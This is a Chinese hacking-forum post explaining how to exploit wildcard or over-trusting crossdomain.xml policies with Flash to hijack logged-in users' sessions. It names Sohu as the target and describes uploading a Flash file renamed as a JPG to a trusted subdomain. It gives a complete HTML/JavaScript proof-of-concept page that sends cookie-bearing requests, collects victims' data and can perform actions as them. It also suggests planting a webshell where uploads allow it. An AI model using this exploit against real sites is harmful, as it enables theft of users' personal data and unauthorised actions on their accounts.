搜索
查看: 1117|回复: 0

crossdomain.xml(flash跨域攻击)利用方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-2-22 22:45:15 | 显示全部楼层 |阅读模式
漏洞利用一:
目标站点crossdomain文件配置星号,例如
那么就可以利用flash在任意域向目标发送请求并得到结果,发送请求的时候是带上cookie的,所以就达到了劫持的效果。
PS:这个搜狐的新闻站并没有什么敏感操作,所以跨域请求并没有意义,只能获取一下它的html源码,这里只是举例



接下来需要做的,就是找到一个有敏感操作又配置了*号的站点,然后使用此poc生成你需要劫持的操作,如修改昵称、关注某人等
使用方法,如果是Get直接填写Target Page,如果是Post,填写好POST Data,然后点击Show url with Parameters即可生成链接,然后使用短链接即可(你需要把此项目放在服务器也就是公网上,或者你可以放在百度云新浪云或者任意一个shell上)


漏洞利用二:
然而各大站点都有这种跨域的安全意识,所以他们会把有敏感操作的站点设置各种信任域,例如:(搜狐的用户中心)
  1. <allow-access-from domain="*.sohu.com" />

  2. <allow-access-from domain="*.sohu.com.cn" />

  3. <allow-access-from domain="*.itc.cn" />
复制代码
也就是说,只有这些信任域的flash才能与它进行通讯,但是这样也并不安全,我们只需要让flash在这其中任意一个域下即可,简单说就是找到任意一个没有过滤的上传点(没有过滤?那不是直接传shell..(我这里指的没有过滤仅指没有过滤文件内容,如果你可以控制后缀和路径还能让它解析的话那就拿shell吧) 找了一会,找到上传点(漏洞还未公开这里不方便公布),我们将swf后缀改为jpg,然后上传,得到: http://****.sohu.com/2015******.jpg 接下来你可以又可以使用上面的POC进行劫持操作了,当然也有大牛自己写的版本。 POC:
  1. <html>

  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=gbk"/>
  4. <title>csrftest</title>

  5. <script>
  6. function Connection(Sendtype,url,content,callback){
  7.     if (window.XMLHttpRequest){
  8.         var xmlhttp=new XMLHttpRequest();
  9.     }
  10.     else{
  11.         var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  12.     }
  13.     xmlhttp.onreadystatechange=function(){
  14.         if(xmlhttp.readyState==4&&xmlhttp.status==200)
  15.         {
  16.             callback(xmlhttp.responseText);
  17.         }
  18.     }
  19.     xmlhttp.open(Sendtype,url,true);
  20.     xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  21.     xmlhttp.withCredentials = "true";
  22.     xmlhttp.send(content);
  23. }
  24.   
  25. function sendToJavaScript(strData){
  26.     var theDiv = document.getElementById("HijackedData");
  27.     var content = document.createTextNode(strData);
  28.     theDiv.appendChild(content);
  29.     theDiv.innerHTML += '<br/>'
  30.     //var posturl = "";   //如果是post,请去掉这三行的注释
  31.     //var postdata= "";   
  32.     //Connection("POST",posturl,postdata,function(callback){});
  33.    

  34. }

  35. </script>

  36. </head>

  37. <body>

  38. <div id=HijackedData></div>

  39. <object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://127.0.0.1/upload/2015.jpg">   //你上传的图片后缀的flash

  40. <param name="AllowScriptAccess" value="always">
  41. <param name="flashvars" value="input=http://127.0.0.1">  //你要请求的地址

  42. </object>

  43. </body>

  44. </html>
复制代码
最后让用户访问你构造的POC页面,即可达到劫持的效果
如图,成功跨域获取带有搜狐cookie用户的用户名以及其他资料,当然你还可以模拟其他任何操作,基本用户能做什么,你就能做什么。

相关资料:
案例:
POC:


Just a fun!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表